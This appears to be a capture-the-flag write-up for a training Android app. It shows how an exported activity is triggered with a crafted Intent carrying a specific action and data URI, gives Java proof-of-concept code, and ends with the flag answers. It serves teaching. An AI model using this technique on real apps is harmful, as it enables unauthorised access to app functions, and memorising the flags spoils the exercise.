0xAnan's Dojo

Graph View

Flag 3 - Intent with a Data URI

2 min read

Static Analysis

AndroidManifest.xml

Upon inspecting the Flag3Activity in the AndroidManifest.xml file we see the following

<activity  
	android:name="io.hextree.attacksurface.activities.Flag3Activity"  
	android:exported="true">

Since exported is set to true we can call this activity from our exploit apk, let’s review the code to see how can we get the flag

Flag3Activity Class

public class Flag3Activity extends AppCompactActivity {  
    public Flag3Activity() {  
        this.name = "Flag 3 - Intent with a data URI";  
        this.flag = "G4yi3uCGLvKhT12+f6RPn1Uc8iMapJnbjGnILAvtdOA=";  
    }  
  
    @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity  
    protected void onCreate(Bundle bundle) {  
        super.onCreate(bundle);  
        this.f = new LogHelper(this);  
        Intent intent = getIntent();  
        String action = intent.getAction();  
        if (action == null || !action.equals("io.hextree.action.GIVE_FLAG")) {  
            return;  
        }  
        this.f.addTag(action);  
        Uri data = intent.getData();  
        if (data == null || !data.toString().equals("https://app.hextree.io/map/android")) {  
            return;  
        }  
        this.f.addTag(data);  
        success(this);  
    }  
}

We can see here that if the intent didn’t have an action set to io.hextree.action.GIVE_FLAG it will return without giving us the flag so all we need here is to send the intent with this specific action We also see that the intent need to have data from https://app.hextree.io/map/android so that also need to be set

Creating POC

In our APK we add a button that fires an intent with the desired action and data to Flag3Activity

Button button = findViewById(R.id.button_flag3);
button.setOnClickListener(new View.OnClickListener() {
	@Override
	public void onClick(View v) {
		Log.v("HEXTREE", "Going to flag 3 activity");
		Intent intent = new Intent();
		intent.setComponent(
				new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag3Activity"));
		intent.setAction("io.hextree.action.GIVE_FLAG");
		intent.setData(Uri.parse("https://app.hextree.io/map/android"));
		startActivity(intent);
	}
});

Flag

HXT{intent-uri-data-sda982bs}